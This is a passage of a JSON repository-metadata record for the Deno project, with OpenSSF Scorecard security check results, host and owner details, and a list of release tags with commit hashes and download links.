to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url"